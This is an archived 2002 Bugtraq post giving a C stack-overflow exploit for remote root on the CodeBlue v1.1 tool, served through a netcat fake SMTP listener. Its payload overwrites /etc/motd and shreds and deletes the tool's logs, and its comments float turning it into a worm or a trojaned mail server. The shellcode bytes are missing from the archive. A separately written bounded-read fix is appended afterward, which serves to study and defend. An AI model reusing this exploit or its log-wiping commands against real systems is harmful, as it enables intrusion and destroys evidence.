Bugtraq mailing list archives

codeblue remote root
From: "Andrew Griffiths" <andrewg () tasmail com>
Date: Fri, 15 Feb 2002 19:34:32 +1100 (EST)

/*
 * Demonstration linux-x86 remote root against codeblue v1.1 (from file header)
 * Otherwise it's known as CodeBlue v4
 * This is rather trivial to exploit...
 * From get_smtp_reply()
 * "We'll loop infinately, receiving
 * 1 byte at a time until we receive a carriage return
 * or line-feed character, signifying the end of the output"
 * The stack looks like
 *   int get_smtp_reply(int sd)
 *   {
 *       char response[1024];
 *       char reply_message[1024];
 *   ...
 * I probably don't have to mention it, but it reads the response into response.
 * ...
 * Also, since this is meant to increase security a little, why doesn't it
 * filter non-alphanumeric chars? Also, since it is playing with untrusted
 * data, why doesn't it drop uids, instead of insisting on running as root?
 *    if ((userid = getuid()) != 0) {
 *       fprintf(stderr, "uid %d is invalid!\n", userid);
 *       fprintf(stderr, "This program MUST be run as root\n");
 *       exit(1);
 *    }
 * Usage: gcc exp.c -o exp; ./exp | nc -l -p 25
 * Now you could do (on another terminal)
 * printf "GET /default.ida?NNNNNN HTTP/1.0\n\n" | nc remotehost 80
 * and wait until codeblue runs.
 * Granted, nc makes it remote, but why reinvent the wheel?
 * Oh, and by the way, you'll most likely have to change the offset down there.
 * Lots of improvements could be (well, have been) done, such as a select(), read(),
 * write(), so you can get a remote terminal... at the moment, all it'll do
 * is make the id command display. Brute force is interesting, because you
 * have to wait until it's run. I suspect, though I haven't tried, you could
 * almost double the nop size by playing around with reply_message.
 * If you had a sense of humour, you probably could turn this into a worm. This
 * is one of the reasons I don't really like automated response/attack software.
 * Or you could just trojan/modify your existing smtp to do this whenever it
 * receives a HELO localhost...
 * The interesting part of this is the bug in codeblue helped me win
 * a wargame. We were given root on a box in a LAN, and got to penetrate
 * several others. Since the person running it was sick of being scanned by
 * the various worms, he was running this....
 * Now for the paranoia part, how many of those scans have you received were
 * to check if you were running CodeBlue?
 * laters,
 * -- Andrew Griffiths
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

/* The shellcode beats doing a bindshell/connect code, since codeblue already is
 * talking to our (supposed) smtp server, so all we have to do is redirect
 * stdin/out/err to fd 5. (Assuming fd 5 is the smtp connection. It was on
 * mine.)
 */

unsigned char sc[] =
/* dupsh basically, dup2(5, (0,1,2)) */
/* Standard aleph1 shellcode */
        "";     /* the shellcode bytes are not present in the archived post */

int main(void)
{
        unsigned char buf[3000];
        memset(buf, 0, 3000);

        /* NOP sled followed by the shellcode */
        memset(buf, 0x90, 967);
        strncpy((char *)buf + 967, (const char *)sc, strlen((const char *)sc));
        fprintf(stderr, "buf: %s\n", buf);
        fprintf(stderr, "strlen(buf): %zu\n", strlen((const char *)buf));
        /* Saved return address, little-endian (the offset the post says
         * you'll most likely have to change) */
        buf[1036] = 0xd0;
        buf[1037] = 0xdf;
        buf[1038] = 0xff;
        buf[1039] = 0xbf;
        /* Command string; the second strcpy replaces the first */
        strcpy((char *)buf + 1040, " id");
        strcpy((char *)buf + 1040, " echo warning codeblue has a remote root hole in it >/etc/motd; shred -z codeblue*log* 2>/dev/null; rm -f codeblue*log* 2>/dev/null; echo you sux. RTFC...");
        printf("%s", buf);
        return 0;
}
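A bounded replacement for the byte-at-a-time reply loop the post quotes from get_smtp_reply(), added here as an example and not code from the post or from CodeBlue; the function names, the pipe-based demo helper and the constructed replies are my own. It keeps the post's 1024-byte response buffer and shows a reply longer than the buffer being rejected instead of running off the end of the stack.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Bounded version of the loop the post describes: read one byte at a time until
 * CR or LF, but never store more than cap-1 bytes and always NUL-terminate.
 * Returns the line length, or -1 with errno = EMSGSIZE when the input overflows. */
ssize_t read_smtp_line(int fd, char *buf, size_t cap)
{
    size_t len = 0;
    if (cap == 0) { errno = EINVAL; return -1; }
    for (;;) {
        unsigned char c;
        ssize_t n = read(fd, &c, 1);
        if (n <= 0) { buf[len] = '\0'; if (n == 0) errno = ECONNRESET; return -1; }
        if (c == '\r' || c == '\n') break;
        if (len + 1 >= cap) {            /* no room for this byte plus the NUL */
            buf[len] = '\0';
            errno = EMSGSIZE;            /* caller should drop the connection */
            return -1;
        }
        buf[len++] = (char)c;
    }
    buf[len] = '\0';
    return (ssize_t)len;
}

/* Demo helper: feed a constructed reply through a pipe as if it came from the
 * SMTP peer (reply_len stays below the pipe buffer, so write does not block). */
ssize_t demo_reply(const char *reply, size_t reply_len, char *out, size_t cap)
{
    int p[2];
    if (pipe(p) != 0) return -1;
    ssize_t w = write(p[1], reply, reply_len);
    close(p[1]);
    ssize_t r = (w == (ssize_t)reply_len) ? read_smtp_line(p[0], out, cap) : -1;
    close(p[0]);
    return r;
}

int main(void)
{
    char response[1024];                 /* the buffer size named in the post */
    char big[3000];                      /* constructed oversized reply */
    memset(big, 'N', sizeof big - 1); big[sizeof big - 1] = '\n';
    ssize_t r = demo_reply(big, sizeof big, response, sizeof response);
    printf("oversized reply: rc=%zd (%s), kept %zu bytes\n", r, strerror(errno), strlen(response));
    return 0;
}
```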

